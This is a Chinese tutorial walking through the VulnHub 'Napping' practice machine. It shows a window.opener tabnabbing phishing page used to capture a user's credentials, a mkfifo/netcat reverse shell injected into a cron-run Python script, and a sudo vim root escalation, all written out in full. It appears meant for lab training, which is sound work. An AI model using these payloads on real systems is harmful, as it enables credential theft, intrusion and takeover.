napping靶机教程(超详细讲解)
第一步搭建环境
下载地址:https://download.vulnhub.com/napping/napping-1.0.1.ova
下载完成后,直接用VM打开,
这样的话点一下重试就好了。
然后右击虚拟机设置网络连接改成nat模式
第二步信息收集
然后做上角编辑,虚拟网络编辑器看一下自己是哪个网段
然后打开我们的kali,使用nmap工具扫一下它的具体IP,注意这里kali也必须是nat模式。
nmap 192.168.109.1/24
发现没有扫到。这里我们的操作是没有任何问题的,考虑应该是靶机网卡配置的问题,一般靶机都会有这个问题。
我们先把靶机关机。
然后,开机长按shift建,(注意手速一定要快)然后按e键进入修改界面找到 ro ******** 这一部分,可能有所差异,如果ro后面有字符 则直接在后面添加 rw single init=/bin/bash 如果没有字符则直接将ro改为 rw single init=/bin/bash。
ctrl+x保存
再按e修改网络配置文件 /etc/network/interfaces 文件(没有的话去/etc/netplan目录下的yaml文件),如果/输不出来就一级级目录跳转。将里面的内容修改为下图所示。然后重启虚拟机。
重启,我们再去用kali的nmap工具扫描一下
这下我们正常的扫到了靶机的IP,注意大部分靶机扫不到IP都是网卡配置的问题,所以网卡配置这里一定要学会。
然后我们去访问我们的靶机
第三步web渗透
这里给了一个登录框,并且还给了我们一个注册账号功能。我先注册登录一下,看看有什么东西可以利用。
可以看到这个是一个博客推广网站,有这个提交链接功能,我们先随便提交一个链接,看看他的功能到底是什么。然后再找出他有什么漏洞。
这里我是测试,随便输入了一个百度网址,提交完了以后,他多了一个Here按钮,点一下直接跳到了我们的输入的响应页面
既然他会跳转页面的话,我们就可以写一个钓鱼页面,让他跳转到我们是页面上。原理如下;
我们到kali里写一个b.html文件内容如下;其中里面的IP地址为你的kali的ip
<!DOCTYPE html>
<html>
<body><script>if(window.opener) window.opener.parent.location.replace('http://192.168.109.128:7777/a.html');if(window.opener != window) window.opener.parent.location.replace('http://192.168.109.128:7777/a.html');</script>
</body>
</html>
- 这段代码的目的是:如果当前页面是被另一个页面(比如浏览器新标签页或弹出窗口)打开的,就强行把那个“父页面”的网址改掉,让它跳转到一个攻击者控制的恶意网站(
http://192.168.109.128:7777/a.html
)。 - 攻击者的目标:让用户以为自己还在原来的网站(比如社交平台),但实际上已经被骗到了钓鱼网站。
关键概念解析
(1) window.opener
是什么?
- 当你通过以下方式打开一个新页面时:
- 点击一个链接:
<a href="新页面.html" target="_blank">
(新标签页打开) - 或用 JavaScript:
window.open("新页面.html")
- 点击一个链接:
- 新页面(子页面) 可以通过
window.opener
访问打开它的那个页面(父页面)的window
对象。 - 这意味着子页面可以操控父页面的行为,比如修改它的网址、读取它的内容(如果没防护)。
(2) window.opener.parent.location.replace()
是什么?
window.opener
:子页面访问父页面的window
对象。parent.location.replace()
:修改父页面的网址(类似window.location.replace()
,但parent
通常用于 iframe 嵌套场景)。- 这里可能是混淆写法,因为
window.opener
本身已经是父页面的window
对象,直接window.opener.location.replace()
更常见。
(3) if(window.opener != window)
的作用
- 检查当前页面是否是通过
window.open()
或<a target="_blank">
打开的(即window.opener
存在且不等于自身)。 - 如果是,则执行 URL 替换。
然后我们再创建一个a.html,内容如下;
<html><body>aaaaaa</body>
</html>
尽量把这两个文件,创建在一个好找的目录下,推荐是根目录
kali开启7777端口监听
nc -lvp 7777
然后用python开启一个临时的http服务,目的是让网站能访问到(注意开这个的时候,监听不要动,再开一个窗口)
python3 -m http.server 8000
然后去靶机那个功能那里,让他跳转我们的页面
http://192.168.109.128:8000/b.html
提交的时候有的靶机会卡,稍等一会。
可以看到咱们监听的端口,监听到了daniel和它的密码
密码这里需要url解码一下
这里我们知道了账号和密码然后我们使用ssh服务连接一下,可以用连接工具连一下
咱们去翻找一下发现咱们的权限还是普通用户,再认真翻找一下
第四步提权
发现一个python脚本,这个脚本又打开了一个site_status.txt文件,每两分钟执行一次
然后我们用vim再里面查一条语句来反弹shell
先把刚才kali监听打开
import osos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.128 7777 >/tmp/f")
等两分钟
kali弹出shell后用下面命令提权
sudo vim -c ':!/bin/bash'